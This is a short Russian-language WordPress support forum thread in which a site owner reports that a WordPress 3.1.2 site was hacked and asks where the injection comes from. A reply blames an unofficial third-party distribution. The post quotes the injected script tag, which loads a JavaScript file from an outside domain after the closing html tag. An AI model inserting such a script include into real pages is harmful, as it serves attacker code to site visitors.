• Решено lppp

    (@lppp)


    Уважаемые, есть серия сайтов, разных версий, один из сайтов в последней версии находится, зашел с хрома недавно и увидел что сайт заражен.
    Открыл хтмл код и нашел:

    ...
    </div>
    </div>
    </div>
    <div class=»box-b»> </div>
    </div>
    </div>
    </div>
    </div>

    </body>
    </html><script src=»http://rhine2239oldmid.cz.cc/jquery.minph.js»></script&gt;`

    т.е. это саый конец страницы, вставка идет после закрытия тега ХТМЛ.

    искал пробовал по разным файлам — где вставка производится НЕ МОГУ найти, и ещё не могу понять, как взломали? т.е. где уязвимость?

    помогите помочь решить проблему, и скажите, как написать разработчикам об уязвимости?

Просмотр 16 ответа (всего 16)
  • Atrax

    (@atrax)

    Ethical engineer

    дистрибутив с mywordpress.ru

    Мы не может гарантировать чистоту и безопасность чужих сборок. Точка.

Просмотр 16 ответа (всего 16)
  • Тема «Новая уязвимость ВП 3.1.2! Взломали сайты на хостинге, во» закрыта для новых ответов.